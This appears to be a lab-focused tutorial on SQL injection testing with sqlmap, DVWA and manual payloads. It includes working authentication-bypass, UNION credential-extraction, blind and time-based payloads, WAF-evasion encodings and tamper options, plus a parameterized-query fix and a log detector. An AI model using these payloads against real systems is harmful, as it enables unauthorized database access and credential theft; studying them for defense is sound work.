SQL injection attack on vulnerable website

Day 4: SQL Injection Testing

Extracting Data: SQL Injection with SQLMap & Manual Payloads

SQL injection (SQLi) is one of the most critical vulnerabilities in web applications, allowing attackers to manipulate database queries by injecting malicious input. Parrot OS, a Debian-based Linux distribution designed for cybersecurity, provides robust tools for testing and exploiting SQLi vulnerabilities. On Day 4 of this 7-day web application hacking series, we focus on mastering SQL injection techniques. This article covers understanding GET and POST SQL injection, testing with sqlmap and Damn Vulnerable Web Application (DVWA), performing manual injection with payloads like ' OR '1'='1 --, and bypassing filters and Web Application Firewalls (WAFs). All commands use example.com as the illustrative target, but testing must be conducted on your local lab (e.g., DVWA or OWASP Juice Shop from Day 1) to ensure ethical practices. Both graphical user interface (GUI) and command-line interface (CLI) methods are included, with additional techniques like error-based and blind SQLi to provide comprehensive coverage. By mastering these techniques, you will be equipped to identify and exploit SQLi vulnerabilities ethically and effectively.

Verifying the Test Lab

Ensure your test lab from Day 1 (DVWA and OWASP Juice Shop) is operational before proceeding with SQL injection testing.

  1. Check LAMP Stack:
    sudo systemctl status apache2
    sudo systemctl status mysql
    Verify that Apache and MySQL are running.
  2. Access DVWA: Navigate to http://localhost/dvwa, log in with admin/password, and set the security level to “Low” for easier testing.
  3. Access Juice Shop: Navigate to http://localhost:3000 to confirm OWASP Juice Shop is running.

Ethical Note: All commands use example.com for illustrative purposes. Only test on systems you own or have explicit permission to assess, such as your local lab. Unauthorized testing of live systems like example.com is illegal and unethical.

Task: Verify that DVWA is accessible and set to “Low” security level, and confirm OWASP Juice Shop is operational.

Outcome: Your test lab is ready for SQL injection testing.

Understanding GET and POST SQL Injection

SQL injection occurs when an application fails to sanitize user input, allowing malicious SQL queries to be executed against the database. SQLi can lead to data theft, authentication bypass, or database manipulation.

GET SQL Injection

GET-based SQLi occurs in URL parameters, where user input is passed directly to a database query.

  • Example: A URL like http://example.com/view.php?id=1 may query the database with SELECT * FROM users WHERE id = '1'.
  • Vulnerability: Injecting ' OR '1'='1 into the id parameter could modify the query to SELECT * FROM users WHERE id = '' OR '1'='1', returning all users.

POST SQL Injection

POST-based SQLi occurs in form submissions, where input fields (e.g., login forms) are processed without proper sanitization.

  • Example: A login form sending username=admin&password=pass may query SELECT * FROM users WHERE username = 'admin' AND password = 'pass'.
  • Vulnerability: Injecting admin' OR '1'='1' -- as the username could bypass authentication by altering the query.
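As an added example (not code from the original post), here is the login query from the POST case above built both ways: by string concatenation, which is the same defect the GET example shows, and with a parameterized query, which is the fix. It uses an in-memory SQLite database with constructed rows so it runs offline; table, columns and sample users are assumptions for the demo.

```python
import sqlite3

SQLI_USERNAME = "admin' OR '1'='1' --"   # the bypass payload quoted on the page


def make_db():
    """Throwaway users table with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    # Plaintext passwords only to mirror the page's query; real apps store hashes.
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "s3cret"), (2, "gordonb", "abc123")])
    return db


def login_vulnerable(db, username, password):
    """Query text assembled from user input: the shape the page describes.
    The injected username closes the string, adds OR '1'='1' and comments
    out the password check, so every row is returned."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return [row[0] for row in db.execute(sql)]


def login_safe(db, username, password):
    """Same query with bound parameters: the input is compared as data and
    never parsed as SQL, so the payload simply fails to match a username."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (username, password))]


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, SQLI_USERNAME, "wrong"))  # ['admin', 'gordonb']
    print(login_safe(db, SQLI_USERNAME, "wrong"))        # []
    print(login_safe(db, "admin", "s3cret"))             # ['admin']
```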

Types of SQL Injection

  • Union-Based SQLi: Uses UNION to retrieve additional data (e.g., 1' UNION SELECT username, password FROM users --).
  • Error-Based SQLi: Exploits database error messages to extract information.
  • Blind SQLi: Infers data by observing application behavior (e.g., true/false responses).
  • Time-Based SQLi: Uses delays (e.g., SLEEP(5)) to confirm vulnerabilities.

Task: Review the SQL Injection module in DVWA and identify whether it uses GET or POST requests by inspecting the URL or form submission.

Outcome: You understand the mechanics of GET and POST SQL injection and various SQLi types.

Testing with sqlmap and DVWA

sqlmap is an automated tool for SQL injection testing, capable of detecting and exploiting vulnerabilities. We will use it with DVWA and illustrative commands for example.com.

sqlmap CLI Commands

  • Basic Scan (GET):
    sqlmap -u "http://example.com/view.php?id=1" --batch
    Scans the URL for SQLi vulnerabilities in batch mode.
  • Enumerate Databases:
    sqlmap -u "http://example.com/view.php?id=1" --dbs --batch
    Lists available databases.
  • Enumerate Tables:
    sqlmap -u "http://example.com/view.php?id=1" -D example_db --tables --batch
    Lists tables in the example_db database.
  • Dump Table Data:
    sqlmap -u "http://example.com/view.php?id=1" -D example_db -T users --dump --batch
    Dumps data from the users table.
  • POST Request Testing:
    sqlmap -u "http://example.com/login.php" --data="username=admin&password=pass" --batch
    Tests a POST-based login form.
  • Error-Based SQLi:
    sqlmap -u "http://example.com/view.php?id=1" --technique=E --batch
    Uses error-based techniques.
  • Blind SQLi:
    sqlmap -u "http://example.com/view.php?id=1" --technique=B --batch
    Uses boolean-based blind SQLi.
  • Time-Based SQLi:
    sqlmap -u "http://example.com/view.php?id=1" --technique=T --batch
    Uses time-based delays.
  • Cookie-Based Injection:
    sqlmap -u "http://example.com/view.php" --cookie="session=abc123; security=low" --batch
    Tests injection via cookies (replace abc123 with a valid session ID). Note that sqlmap does not test Cookie header values at its default --level of 1; they are only tested at --level 2 or higher.
  • Output to File:
    sqlmap -u "http://example.com/view.php?id=1" --dump --output-dir=sqlmap_results --batch
    Saves results to the sqlmap_results directory.

sqlmap with DVWA (GUI and CLI)

  1. GUI (sqlmap with Burp Suite):
    • Configure Burp Suite (Day 3) to intercept DVWA’s SQL Injection module (http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit).
    • Copy the intercepted request to a file (e.g., request.txt).
    • Run sqlmap with the request file:
      sqlmap -r request.txt --batch
  2. CLI (Direct Testing):
    sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" --batch
    Replace your_session_id with the session cookie from Firefox’s developer tools.
  3. Dump Users Table:
    sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" -D dvwa -T users --dump --batch

Task: Use sqlmap to test DVWA’s SQL Injection module for GET-based SQLi and dump the users table. Run a scan on http://example.com/view.php?id=1 in your lab if applicable.

Outcome: You can automate SQL injection testing with sqlmap using both GUI and CLI methods.

Manual Injection Basics

Manual SQL injection involves crafting payloads to test vulnerabilities without automation, providing deeper insight into application behavior.

GET Injection Payloads

Test these payloads in a vulnerable GET parameter (e.g., http://example.com/view.php?id=1).

  • Basic Authentication Bypass:
    http://example.com/view.php?id=1' OR '1'='1 --
    Returns all records by making the query always true.
  • Union-Based:
    http://example.com/view.php?id=1' UNION SELECT 1, username, password FROM users --
    Retrieves usernames and passwords.
  • Error-Based:
    http://example.com/view.php?id=1' AND 1=CONVERT(int, (SELECT @@version)) --
    Triggers a database error to extract version information. This CONVERT(int, ...) form is Microsoft SQL Server syntax and is not valid in MySQL, so it does not apply to DVWA's MySQL backend.
  • Blind Boolean-Based:
    http://example.com/view.php?id=1' AND (SELECT 1 FROM users WHERE username='admin')=1 --
    Infers data based on true/false responses.
  • Time-Based:
    http://example.com/view.php?id=1' AND IF(1=1, SLEEP(5), 0) --
    Causes a delay if the condition is true.

POST Injection Payloads

Use Burp Suite or OWASP ZAP (Day 3) to intercept and modify POST requests.

  • Authentication Bypass: In a login form, set the username to:
    admin' OR '1'='1' --
    And password to any value.
  • Union-Based: Modify a POST parameter (e.g., search):
    search=test' UNION SELECT 1, username, password FROM users --
  • Blind Time-Based: Set a POST parameter to:
    search=test' AND IF(1=1, SLEEP(5), 0) --

Testing with DVWA

  • GUI (Burp Suite/ZAP):
    • Intercept a request to http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit.
    • Modify the id parameter to 1' OR '1'='1 -- and forward the request.
    • Observe if additional data (e.g., all users) is returned.
  • Manual Browser Testing:
    http://localhost/dvwa/vulnerabilities/sqli/?id=1' OR '1'='1 --&Submit=Submit
    Enter in the browser and check the response.

Task: Test DVWA’s SQL Injection module with manual GET and POST payloads, including ' OR '1'='1 -- and a union-based payload.

Outcome: You can manually craft and test SQL injection payloads to understand application vulnerabilities.

Bypassing Filters and WAF Evasion Basics

Web applications and WAFs may filter SQLi payloads, requiring techniques to bypass restrictions.

Common Filters

  • Keyword Filtering: Blocks words like UNION, SELECT, or --.
  • Character Filtering: Removes quotes or special characters.
  • Input Length Limits: Restricts the length of input strings.

Bypassing Filters

  • Case Variation:
    http://example.com/view.php?id=1' UnIoN SeLeCt 1, username, password FrOm users --
    Uses mixed case to bypass keyword filters.
  • Inline Comments:
    http://example.com/view.php?id=1' U/**/NION S/**/ELECT 1, username, password FROM users --
    Inserts comments to break keyword detection.
  • Encoding:
    http://example.com/view.php?id=1' %55%4E%49%4F%4E %53%45%4C%45%43%54 1, username, password FROM users --
    Uses URL encoding for UNION SELECT.
  • Double Encoding:
    http://example.com/view.php?id=1' %2555%254E%2549%254F%254E %2553%2545%254C%2545%2543%2554 1, username, password FROM users --
    Applies URL encoding twice (%25 is an encoded percent sign); this only matters when the application or WAF decodes input more than once.

WAF Evasion with sqlmap

  • Tamper Scripts:
    sqlmap -u "http://example.com/view.php?id=1" --tamper=space2comment --batch
    Replaces spaces with comments (e.g., /**/).
  • Random User-Agent:
    sqlmap -u "http://example.com/view.php?id=1" --random-agent --batch
    Uses a random User-Agent to evade detection.
  • Delay Between Requests:
    sqlmap -u "http://example.com/view.php?id=1" --delay=2 --batch
    Adds a 2-second delay to mimic human traffic.
  • Proxy Usage:
    sqlmap -u "http://example.com/view.php?id=1" --proxy=http://127.0.0.1:8080 --batch
    Routes traffic through a proxy (e.g., Burp Suite).
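The filter bypasses and sqlmap evasion options above only defeat defenses that match raw input. As an added example (not from the original page), this detection routine shows the normalization a defender applies before matching, run over constructed Apache-style log lines: bounded repeated URL decoding handles the encoded and double-encoded payloads, comment stripping and case folding handle U/**/NION and UnIoN, and sqlmap's default User-Agent is flagged as a weak signal that --random-agent removes. The log format, patterns and entries are assumptions for the demo.

```python
import re
from urllib.parse import unquote

# Indicators taken from payloads on this page (illustrative, not a ruleset).
SQLI_PATTERNS = [
    r"union\s+select",          # union-based extraction
    r"'\s*or\s*'1'\s*=\s*'1",    # classic always-true clause
    r"sleep\s*\(",              # time-based probe
]
# Apache combined log: request line, status, size, referer, user-agent.
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) [^"]*" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"')

def normalize(raw):
    """Undo what a naive keyword filter misses: bounded repeated URL decoding
    (covers double encoding), inline comments, case and whitespace tricks."""
    text = raw
    for _ in range(3):                      # bounded: no loop on hostile input
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", "", text)   # U/**/NION -> UNION
    return re.sub(r"\s+", " ", text).lower()

def inspect_log_line(line):
    """Return why a line looks like SQLi probing, or None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    # Weak signal on its own: the --random-agent option replaces this string.
    if "sqlmap" in m.group("ua").lower():
        return "sqlmap default User-Agent"
    query = normalize(m.group("target").partition("?")[2])
    for pat in SQLI_PATTERNS:
        if re.search(pat, query):
            return f"pattern {pat!r} in query string"
    return None

def scan(lines):
    """Return (line index, reason) for every suspicious line."""
    return [(i, r) for i, r in enumerate(map(inspect_log_line, lines)) if r]

SAMPLE_LOG = [  # constructed entries for this demo, not real traffic
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /view.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /view.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '10.0.0.8 - - [01/Jan/2024:10:00:02 +0000] "GET /view.php?id=1%27%20U/**/NION%20S/**/ELECT%201 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /view.php?id=1%27%20%2555%254E%2549%254F%254E%20%2553%2545%254C%2545%2543%2554%201 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /view.php?id=1%27%20AND%20IF(1%3D1,SLEEP(5),0)%20-- HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]
```

Calling scan(SAMPLE_LOG) flags every entry except the first; the 500 status on the inline-comment line is the kind of error-based probe signal worth correlating with this match.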

Task: Test DVWA’s SQL Injection module with a filter-bypassing payload (e.g., inline comments) and use sqlmap with a tamper script on http://example.com/view.php?id=1 in your lab.

Outcome: You can bypass basic filters and WAFs to test SQLi vulnerabilities.

Practical Exercise

  1. Verify your DVWA and OWASP Juice Shop lab setup.
  2. Use sqlmap to test http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit for SQLi and dump the users table.
  3. Test manual GET and POST payloads (e.g., ' OR '1'='1 --) on DVWA’s SQL Injection module.
  4. Attempt filter bypassing with case variation and inline comments on http://example.com/view.php?id=1 (in your lab).
  5. Use sqlmap with a tamper script and random User-Agent on http://example.com/view.php?id=1.

Conclusion

Day 4 of this 7-day web application hacking series has equipped you with the skills to test for SQL injection vulnerabilities using Parrot OS. By understanding GET and POST SQLi, leveraging sqlmap for automated testing, crafting manual payloads, and bypassing filters and WAFs, you can identify and exploit database vulnerabilities in a controlled environment. These techniques are critical for ethical hacking and vulnerability assessment. Continue practicing in your lab, and prepare for Day 5, where you will explore Cross-Site Scripting (XSS) and other client-side attacks.

Next Steps:

  • Experiment with additional sqlmap tamper scripts and manual payloads in DVWA.
  • Explore SQLi challenges in OWASP Juice Shop.
  • Engage with cybersecurity communities on platforms like X to share insights and learn best practices.
